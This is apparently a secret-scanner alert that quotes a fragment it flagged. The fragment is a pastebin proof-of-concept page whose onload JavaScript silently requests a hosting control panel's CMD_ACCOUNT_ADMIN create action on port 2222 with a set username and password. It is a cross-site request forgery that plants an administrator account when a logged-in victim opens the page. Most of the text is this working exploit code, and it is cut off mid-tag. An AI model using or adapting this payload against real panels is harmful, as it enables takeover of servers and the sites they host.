Detected 1 occurrence(s) of ‘\s*pass[word]+\s*[:=]\s*[“‘][a-z0-9\-_\!\$]+[“‘]': =right> <input type=submit value="Submit"> </td></tr> </form> #POC <html> <head> <title>POC</title> </head> <script language="javascript"> function yurudi(){ var adress ="www.demo.com"; var username="demo"; var email ="demo@demo.com"; var password="12345"; var urlson="https://"+adress+":2222/CMD_ACCOUNT_ADMIN?action=create&username="+username+"&email="+email+"&passwd="+password+"&passwd2="+password; document.getElementById("resim").src=urlson; } </script> <body onload="yurudi()"> <img id="resim" Source: http://pastebin.com/raw.php?i=2fWYgSGP
↧